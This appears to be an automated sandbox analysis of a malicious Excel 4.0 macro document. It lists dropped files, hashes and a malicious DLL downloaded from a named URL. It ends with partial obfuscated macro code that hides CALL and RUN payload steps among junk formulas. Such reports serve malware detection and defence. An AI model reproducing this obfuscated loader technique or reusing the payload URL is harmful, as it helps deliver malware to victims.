SHA-512:	C3D8CC098D9B61ADF6D89E5B0F9CA41C236741B7449581288E6F2099C724B26CDE6B2EBE3E7D15B231D4E1B4A343FBA0729E8C4A050380E8883A66F348D630FC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.8.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER640D.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4621
Entropy (8bit):	4.450060334493844
Encrypted:	false
SSDEEP:	48:cvIwSD8zszJgtWI9fvWSC8BP8fm8M4JkMGEF/Q+q8sSdUKJY5gd:uITfNk+SNGJAZqY5gd
MD5:	BA42F4ED21FCF20EA61DE53019AFF2E6
SHA1:	5F31D906B4D7898680740E47012E551444C41329
SHA-256:	E8909D4B3BCEF7BB6D8526B105E79A8BC69CFF24755013DAA5091CB5A24CB7BF
SHA-512:	820EEABF7A4172B5A0D469F7D5C38FF6F77AC283469EC5D294432C78BD50FC22860F2FB97D8E3A0E824C3B57259FF39BB8D8F7E1313E44415EF781696638ED15
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="986204" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9B0D8C85-82C2-4C91-AEDC-B9459681EEEA Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	134558
Entropy (8bit):	5.36837155136519
Encrypted:	false
SSDEEP:	1536:IcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:vEQ9DQW+zPXO8
MD5:	421B3B97C4DD0FB55E325A1D2AE0D0C8
SHA1:	52C5DC8226280C0F3A5E9A7005B20768E0CF4250
SHA-256:	44A5C380DB28AF6E10E6037428D4E955FD1324511F0E03656134371F86DC9DDB
SHA-512:	EF9CC8A5F9C09FF5C23FEE36F40DBE56241ACC2E90CFED934A04D775281EFBF61133E62C7E805777964C634219A7758A2F190B63CD3772962BCBF6B08A40ED02
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T11:32:25">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	395500
Entropy (8bit):	6.001802978220178
Encrypted:	false
SSDEEP:	3072:AJh65mtNNZQJjumcc/9zZppSFR1qY2/N33i7eVZ5qP3Ca6xzDthbrath0PIk:AJBNNcjuQ/9zoaV3EeVHq/Ca6Vbrdg
MD5:	79E922F1BC80F1C6D9F7273DD2CC67A7
SHA1:	31502F7EFDE63CD3FAE8C1258458CC9070A51749
SHA-256:	25C075C6919DFB86DF81D3E868D1420D88522746ACA34946E864145AD588E5E0
SHA-512:	3116A44D4287F3F585FEFB5D527460D33F0E724879129F6AF2822BD4B8170D7593982AB21575179E3B1480A286A0135BEB2BF7B2F6589E26C21D468BF97919A0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
IE Cache URL:	https://signifysystem.com/ceg7AX7oN0o/ue.html
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..r..o!..o!..o!..\|!..o!..}!..o!Rich..o!................PE..L....c.`...........!......... .......k......................................................................................0...........................................................................................0............................code............................... ..`.data............ ..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0C40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	81548
Entropy (8bit):	7.910222120901931
Encrypted:	false
SSDEEP:	1536:sjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJDt:g+nHSD8YZo/Uh0ZymYQ0y7FAL5t
MD5:	3FAF6C9EC3CA97F2FDBB16AAF7F21538
SHA1:	6EE949BBC6EEAA09970FA0F0712DC63B3ED3351E
SHA-256:	69824A86AA6A1E806A3B6820C01045130690515875A7E23B4E3C5FE73C7C96A2
SHA-512:	26D9E11FF580999CE2D40C4FED2477BD50A003B26E55BF0440C9CD45F867DD91BEE09F04663761FB4581B4DC6566BCED9FE02351A6A447BE6C53D6EA946B7D10
Malicious:	false
Preview:	.U.N#1..#.?.\|.u;p..Q:.f.. .\|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d\|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ\|a......f?I..b....).5V.....9...=J........I.._.....Q\|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\9659e9a8_by_Libranalysis.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Wed May 12 10:32:29 2021, atime=Wed May 12 10:32:29 2021, length=177152, window=hide
Category:	dropped
Size (bytes):	2250
Entropy (8bit):	4.705815148671922
Encrypted:	false
SSDEEP:	48:8Izi0Eoq2VOEEwcNaOExB6pIzi0Eoq2VOEEwcNaOExB6:82i0lqeFyNaFxK2i0lqeFyNaFx
MD5:	6FA30B3E904D62A12E94BEE14F7A29A1
SHA1:	66A94FD22924AE600B07172BCD57AA86E967E6BE
SHA-256:	4B48D4C6FC7E4A305D4FDC86A3D220DC564E7F21E9B34D71C1CBA69D956CA4B0
SHA-512:	B584A61F1ECFFE4D7BD8FFF85DD87790494A37B1069E1106C744383F832AEFCF944DD05072A9D8DC682D04C54A47A169BC318A91BEE54F14D4AACE139DED0BF3
Malicious:	false
Preview:	L..................F.... ...o..S......}"G....}"G...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.\....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q\|<..user.<.......N...R.\....#J....................PDK.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...R.\.....Y..............>.....d.'.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.\ .9659E9~1.XLS..j......>Q{<.R.\.....V........................9.6.5.9.e.9.a.8._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\9659e9a8_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.9.6.5.9.e.9.a.8._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...As...`.......X.......376483...........!a..%.H.VZAj...L................!a..%.H.VZAj...L...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Wed May 12 10:32:29 2021, atime=Wed May 12 10:32:29 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.669574121320632
Encrypted:	false
SSDEEP:	12:8d1XUSduCH2KO0E4isQ9J+WrjAZ/DYbD0RSeuSeL44t2Y+xIBjKZm:8dBi0+P9vAZbcD037aB6m
MD5:	B25CFCF82131C1477BE254A8197AC4D7
SHA1:	C9F9DD0B2A241654D3CABF53181C9104F72A4F33
SHA-256:	BA2619BEC415B0F8436042E36185BFCDA8A399E1ED772FDE3EFFE088561031B9
SHA-512:	9154445B77F891BF81113FEB819F84040B5C60FF1C0AEC44E6B8AE33A1CBE945E81EE452666C022E2FC134CFFE8D2B9CF90835C66C56CF4C615DD6D1014FE591
Malicious:	false
Preview:	L..................F.............-.....}"G..$U.}"G... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.\....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q\|<..user.<.......N...R.\....#J....................PDK.j.o.n.e.s.....~.1......R.\..Desktop.h.......N...R.\.....Y..............>......XI.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......376483...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	125
Entropy (8bit):	4.664326784625596
Encrypted:	false
SSDEEP:	3:oyBVomMEcx14HdGUwSLMp6l7cA14HdGUwSLMp6lmMEcx14HdGUwSLMp6lv:dj6L4HdhNrP4HdhNbL4HdhNf
MD5:	43AA6DB16A8F46F4ECBA390A0C27654B
SHA1:	F81E4099E1ACBCB5C5C1FDEABD4EF079DBD32D32
SHA-256:	41876EF74BEE90E671EC9ACD42CB627C0F108FCE02EEE7523A101F3410D1ABB1
SHA-512:	1DBE7DAF0D2596E53585C49617EB89F46A4F135B81565FC52D51CF0F94D4C27B253A43966D6765A6412527A1DDF886C280A4C867316F53536E95D1DF9CA3FDF6
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..9659e9a8_by_Libranalysis.LNK=0..9659e9a8_by_Libranalysis.LNK=0..[xls]..9659e9a8_by_Libranalysis.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	2.9808259362290785
Encrypted:	false
SSDEEP:	3:QAlX0Gn:QKn
MD5:	7962B839183642D3CDC2F9CEBDBF85CE
SHA1:	2BE8F6F309962ED367866F6E70668508BC814C2D
SHA-256:	5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
SHA-512:	2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
Malicious:	false
Preview:	....p.r.a.t.e.s.h.....

C:\Users\user\Desktop\02C40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	228873
Entropy (8bit):	5.616544637493411
Encrypted:	false
SSDEEP:	3072:a7NiRdSD8YNoTU90uJfzn3b20X7vrPlsrXvLlL7LF7Niux:bRdTrTU9Z0qux
MD5:	09AEDE7585D5AD0099BEB6C37CD691D3
SHA1:	EAAB1B9AAA1E3704BB0CDC619BBD70F5DF20A0CB
SHA-256:	D989BDABA142C45F0AE3CD17B74C1E3AC5476D5FF00E9687414FFA08A105D744
SHA-512:	0C2A3363F0FC9CB81144ACAF80906FA617D5DEF59E794286E24828F05032429F4BACB2C4BB635179331F4F8B2024B04AC69CD2CDA3EC725445FE6466171C9A18
Malicious:	false
Preview:	........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................E..C.a.l.i.b.r.i.1................E..A.r.i.a.l.1................E..A.r.i.a.l.1................E..A.r.i.a.l.1................E..C.a.l.i.b.r.i.1...,...8........E..A.r.i.a.l.1.......8........E..A.r.i.a.l.1.......8........E..A.r.i.a.l.1.......<........E..A.r.i.a.l.1.......4........E..A.r.i.a.l.1.......4........E..A.r.i.a.l.1...h...8........E..C.a.m.b.r.i.a.1................E..C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1.......>...........A.r.i.a.l.1.......?...........A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...............

C:\Users\user\ritofm.cvm Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	395500
Entropy (8bit):	0.00837191942417358
Encrypted:	false
SSDEEP:	6:idqwHVg3F+X32RuZm6wY/Flmml/eVS3XJMgFKR+vlfq:eH1GSGUZmBYNcSWcnugFKR8l
MD5:	B3D98EABC7EAB34E9E3EF6D7A9D24385
SHA1:	B9711AA2FE0E5B7136BDF56C120A8D490569BE0D
SHA-256:	B7C7FFE3ACD3A9FDBC2DF68B3B999E33D29A43B0235FBD68DB6BE8970008E872
SHA-512:	5F6940C42F8D621D813A9C4D42A45DCB81AC1A113EB05B85DB80B0C47AC69727C44F8B9138A8D3C68308F2EC8571D829FFBC800DD4B3EF1686CECEDC85C72AEE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..r..o!..o!..o!..\|!..o!..}!..o!Rich..o!................PE..L....c.`...........!......... .......k......................................................................................0...........................................................................................0............................code............................... ..`.data............ ..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
Entropy (8bit):	3.258986427712615
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	9659e9a8_by_Libranalysis.xls
File size:	375808
MD5:	9659e9a80fba8f055fbe4e3757b0fd88
SHA1:	701af32440a369d3bf1533cf3d741904b614a470
SHA256:	252bda62a929c697a8b96035c1a52314d88067e745799cb66ac5d9dd593379b0
SHA512:	2f94eeed0b1cbc7c7e13fbb66ffca3ba193118d5457b85ccfbf81f4f85406d91853383b34e0553a9f9130327d167f1fc5786d8d7935e6a67fa0c4e3a4fd37167
SSDEEP:	3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbcd:vUGAt6Uqa5DPdG9uS9QLp4l+s+o8
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "9659e9a8_by_Libranalysis.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:	van-van
Last Saved By:	vi-vi
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2021-05-12 07:24:11
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.287037498961
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.290777742057
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . \| . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	363283
Entropy:	3.24522262131
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
Data Raw:	09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she

